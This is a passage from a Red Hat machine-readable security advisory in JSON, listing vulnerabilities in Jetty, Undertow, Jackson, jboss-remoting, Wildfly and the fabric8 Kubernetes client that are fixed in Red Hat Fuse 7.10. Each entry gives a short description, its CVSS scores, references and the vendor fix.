"text": "In Eclipse Jetty version 9.4.0.RC0 to 9.4.34.v20201102, 10.0.0.alpha0 to 10.0.0.beta2, and 11.0.0.alpha0 to 11.0.0.beta2, if GZIP request body inflation is enabled and requests from different clients are multiplexed onto a single connection, and if an attacker can send a request with a body that is received entirely but not consumed by the application, then a subsequent request on the same connection will see that body prepended to its body. The attacker will not see any data but may inject data into the body of the subsequent request.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jetty: buffer not correctly recycled in Gzip Request inflation",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "In OpenShift Container Platform (OCP), the Hive/Presto/Hadoop components that comprise the OCP Metering stack, ship the vulnerable version of jetty.\nSince the release of OCP 4.6, the Metering product has been deprecated [1], hence the affected components are marked as wontfix.\nThis may be fixed in the future.\n\n[1] https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html#ocp-4-6-metering-operator-deprecated",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-27218"
},
{
"category": "external",
"summary": "RHBZ#1902826",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1902826"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-27218",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-27218"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-27218",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-27218"
},
{
"category": "external",
"summary": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-86wm-rrjm-8wh8",
"url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-86wm-rrjm-8wh8"
}
],
"release_date": "2020-11-27T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "jetty: buffer not correctly recycled in Gzip Request inflation"
},
{
"cve": "CVE-2020-27223",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2021-02-26T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1934116"
}
],
"notes": [
{
"category": "description",
"text": "In Eclipse Jetty 9.4.6.v20170531 to 9.4.36.v20210114 (inclusive), 10.0.0, and 11.0.0 when Jetty handles a request containing multiple Accept headers with a large number of \u201cquality\u201d (i.e. q) parameters, the server may enter a denial of service (DoS) state due to high CPU usage processing those quality values, resulting in minutes of CPU time exhausted processing those quality values.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jetty: request containing multiple Accept headers with a large number of \"quality\" parameters may lead to DoS",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "In OpenShift Container Platform (OCP), the Hive/Presto/Hadoop components that comprise the OCP Metering stack, ship the vulnerable version of jetty.\nSince the release of OCP 4.6, the Metering product has been deprecated [1], hence the affected components are marked as wontfix.\nThis may be fixed in the future.\n\n[1] https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html#ocp-4-6-metering-operator-deprecated",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-27223"
},
{
"category": "external",
"summary": "RHBZ#1934116",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1934116"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-27223",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-27223"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-27223",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-27223"
},
{
"category": "external",
"summary": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-m394-8rww-3jr7",
"url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-m394-8rww-3jr7"
}
],
"release_date": "2021-02-26T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "jetty: request containing multiple Accept headers with a large number of \"quality\" parameters may lead to DoS"
},
{
"cve": "CVE-2020-27782",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2020-11-24T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1901304"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Undertow AJP connector. Malicious requests and abrupt connection closes could be triggered by an attacker using query strings with non-RFC compliant characters resulting in a denial of service. The highest threat from this vulnerability is to system availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "undertow: special character in query results in server errors",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-27782"
},
{
"category": "external",
"summary": "RHBZ#1901304",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1901304"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-27782",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-27782"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-27782",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-27782"
}
],
"release_date": "2021-01-25T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
},
{
"category": "workaround",
"details": "The issue can be mitigated by using HTTP/1.1 instead of AJP to proxy to the back-end.",
"product_ids": [
"Red Hat Fuse 7.10"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "undertow: special character in query results in server errors"
},
{
"cve": "CVE-2020-28491",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2021-02-18T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1930423"
}
],
"notes": [
{
"category": "description",
"text": "This affects the package com.fasterxml.jackson.dataformat:jackson-dataformat-cbor from 0 and before 2.11.4, from 2.12.0-rc1 and before 2.12.1. Unchecked allocation of byte buffer can cause a java.lang.OutOfMemoryError exception.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jackson-dataformat-cbor: Unchecked allocation of byte buffer can cause a java.lang.OutOfMemoryError exception",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "In OpenShift Container Platform (OCP), the hive/presto/hadoop components that comprise the OCP metering stack, ship the vulnerable version of jackson-dataformat-cbor.\nSince the release of OCP 4.6, the metering product has been deprecated [1], hence the affected components are marked as wontfix.\nThis may be fixed in the future.\n\nIn OCP 4.6 the openshift4/ose-logging-elasticsearch6 container delivers the vulnerable version of jackson-dataformat-cbor, but OCP 4.6 is Out Of Support Scope (OOSS) for Moderate and Low impact vulnerabilities because it is now in the Maintenance Phase of the support, hence this component is marked as ooss. Since the release of OCP 4.7 this component is delivered as part of the OpenShift Logging product (openshift-logging/elasticsearch6-rhel8 container).\n\n[1] https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html#ocp-4-6-metering-operator-deprecated",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-28491"
},
{
"category": "external",
"summary": "RHBZ#1930423",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1930423"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-28491",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-28491"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-28491",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28491"
},
{
"category": "external",
"summary": "https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONDATAFORMAT-1047329",
"url": "https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONDATAFORMAT-1047329"
}
],
"release_date": "2021-02-18T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "jackson-dataformat-cbor: Unchecked allocation of byte buffer can cause a java.lang.OutOfMemoryError exception"
},
{
"cve": "CVE-2020-35510",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2020-12-01T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1905796"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in jboss-remoting. A malicious attacker could cause threads to hold up forever in the EJB server by writing a sequence of bytes corresponding to the expected messages of a successful EJB client request, but omitting the ACK messages, or just tamper with jboss-remoting code, deleting the lines that send the ACK message from the EJB client code resulting in a denial of service. The highest threat from this vulnerability is to system availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jboss-remoting: Threads hold up forever in the EJB server by suppressing the ack from an EJB client",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-35510"
},
{
"category": "external",
"summary": "RHBZ#1905796",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1905796"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-35510",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35510"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-35510",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-35510"
}
],
"release_date": "2020-12-09T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "jboss-remoting: Threads hold up forever in the EJB server by suppressing the ack from an EJB client"
},
{
"acknowledgments": [
{
"names": [
"Damian Bury"
]
}
],
"cve": "CVE-2021-3536",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2021-02-12T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1948001"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Wildfly. While creating a new role in the domain mode via the admin console, it is possible to add a payload in the name field, leading to a Cross-site scripting attack (XSS). The highest threat from this vulnerability is to confidentiality and integrity.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "wildfly: XSS via admin console when creating roles in domain mode",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw does not affect Red Hat CodeReady Studio 12 because it uses the Wildfly client only. The domain mode is not used.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-3536"
},
{
"category": "external",
"summary": "RHBZ#1948001",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1948001"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-3536",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3536"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-3536",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3536"
}
],
"release_date": "2021-04-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"baseSeverity": "LOW",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "wildfly: XSS via admin console when creating roles in domain mode"
},
{
"cve": "CVE-2021-3597",
"cwe": {
"id": "CWE-362",
"name": "Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)"
},
"discovery_date": "2021-02-06T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1970930"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in undertow. The HTTP2SourceChannel fails to write the final frame under some circumstances, resulting in a denial of service. The highest threat from this vulnerability is availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "undertow: HTTP2SourceChannel fails to write final frame under some circumstances may lead to DoS",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat OpenStack Platform\u0027s OpenDaylight will not be updated for this flaw because it was deprecated as of OpenStack Platform 14 and is only receiving security fixes for Important and Critical flaws.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-3597"
},
{
"category": "external",
"summary": "RHBZ#1970930",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1970930"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-3597",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3597"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-3597",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3597"
}
],
"release_date": "2021-06-11T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "undertow: HTTP2SourceChannel fails to write final frame under some circumstances may lead to DoS"
},
{
"cve": "CVE-2021-3629",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2021-04-06T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1977362"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Undertow. A potential security issue in flow control handling by the browser over http/2 may potentially cause overhead or a denial of service in the server. The highest threat from this vulnerability is availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "undertow: potential security issue in flow control over HTTP/2 may lead to DOS",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-3629"
},
{
"category": "external",
"summary": "RHBZ#1977362",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1977362"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-3629",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3629"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-3629",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3629"
}
],
"release_date": "2021-03-29T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "undertow: potential security issue in flow control over HTTP/2 may lead to DOS"
},
{
"cve": "CVE-2021-3690",
"cwe": {
"id": "CWE-401",
"name": "Missing Release of Memory after Effective Lifetime"
},
"discovery_date": "2021-08-06T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1991299"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Undertow. A buffer leak on the incoming WebSocket PONG message may lead to memory exhaustion. This flaw allows an attacker to cause a denial of service. The highest threat from this vulnerability is availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "undertow: buffer leak on incoming websocket PONG message may lead to DoS",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Although Red Hat OpenStack Platform packages the vulnerable code in Opendaylight, it does not use or support the undertow-encapsulating features. The security impact for RHOSP is therefore rated as Low and no update will be provided at this time.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-3690"
},
{
"category": "external",
"summary": "RHBZ#1991299",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1991299"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-3690",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3690"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-3690",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3690"
}
],
"release_date": "2021-07-30T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "undertow: buffer leak on incoming websocket PONG message may lead to DoS"
},
{
"acknowledgments": [
{
"names": [
"Ivan Bodrov"
]
},
{
"names": [
"Marc Nuri"
],
"organization": "Red Hat",
"summary": "This issue was discovered by Red Hat."
}
],
"cve": "CVE-2021-20218",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2021-02-01T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1923405"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the fabric8 kubernetes-client in version 4.2.0 and after. This flaw allows a malicious pod/container to cause applications using the fabric8 kubernetes-client `copy` command to extract files outside the working path. The highest threat from this vulnerability is to integrity and system availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "fabric8-kubernetes-client: vulnerable to a path traversal leading to integrity and availability compromise",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "In OpenShift Container Platform 4 (OCP) there are no plans to maintain the ose-logging-elasticsearch5 container, therefore it has been marked wontfix at this time and maybe fixed in a future update.\n\nRed Hat CodeReady WorkSpaces 2.7.0 does not ship fabric8-kubernetes-client and is therefore not affected by this flaw.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-20218"
},
{
"category": "external",
"summary": "RHBZ#1923405",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1923405"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-20218",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20218"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-20218",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-20218"
},
{
"category": "external",
"summary": "https://github.com/fabric8io/kubernetes-client/issues/2715",
"url": "https://github.com/fabric8io/kubernetes-client/issues/2715"
}
],
"release_date": "2021-01-12T04:35:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "fabric8-kubernetes-client: vulnerable to a path traversal leading to integrity and availability compromise"
},
{
"cve": "CVE-2021-21290",
"cwe": {
"id": "CWE-200",
"name": "Exposure of Sensitive Information to an Unauthorized Actor"
},
